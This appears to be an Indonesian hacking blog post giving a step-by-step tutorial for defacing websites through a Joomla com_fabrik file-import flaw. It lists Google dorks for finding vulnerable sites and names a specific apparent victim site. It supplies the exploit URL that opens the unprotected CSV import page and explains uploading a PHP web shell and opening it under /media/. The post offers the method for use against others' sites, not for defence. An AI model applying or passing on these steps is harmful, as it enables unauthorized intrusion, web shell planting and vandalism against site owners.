Sabtu, 18 Februari 2017

Cara Deface Web Dengan Exploit Com_Fabrik

Tags


Cara Deface Web Dengan Exploit Com Fabrik - Berbicara tentang deface. Cara yang satu ini cukup mudah dilakukan defacer yang sudah ahli. Dengan menggunakan exploit com_fabrik, kita dapat mengupload shell kita untuk melakukan deface terhadap web tersebut.Ok gak usah banyak basa-basi lagi simak tutorial berikut.

Buat agan yang belum mempunyai script defacenya Download Disini. Untun mendownload klik yang gua lingkari 


1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik
                                                 inurl:index.php?option=com_fabrik
                                                 inurl:index.php/component/fabrik/ site:com
                                                 inurl:index.php?option=com_fabrik&view= site:com
                                                 inurl:importcsv.php site:com
                                                 inurl:viewTable?cid= site:com



2. Di dork tersebut akan ada banyak web, agan tinggal pilih terserah mau web yang mana saja. Disini saya sudah mendapatkan target web korban >> http://www.edprint.mercu.asia/




3. Masukkan exploit ini :
 index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Contoh : 
 www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1




4. Jika Berhasil akan muncul seperti gambar dibawah ini pada web target, Jika tidak berhasil cari target lain.




5. Klik "pilih file" atau ''Choose file'' untuk memilih shell, dan klik "Import CSV'' untuk mengupload.


6. Jika berhasil, buka shell anda dengan format www.site.com/media/namashell.php


7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.


Disini saya sudah berhasil ^_^ Selamat Mencoba.



Thank's to Blogger & Google
Sekian. Terima kasih :)








EmoticonEmoticon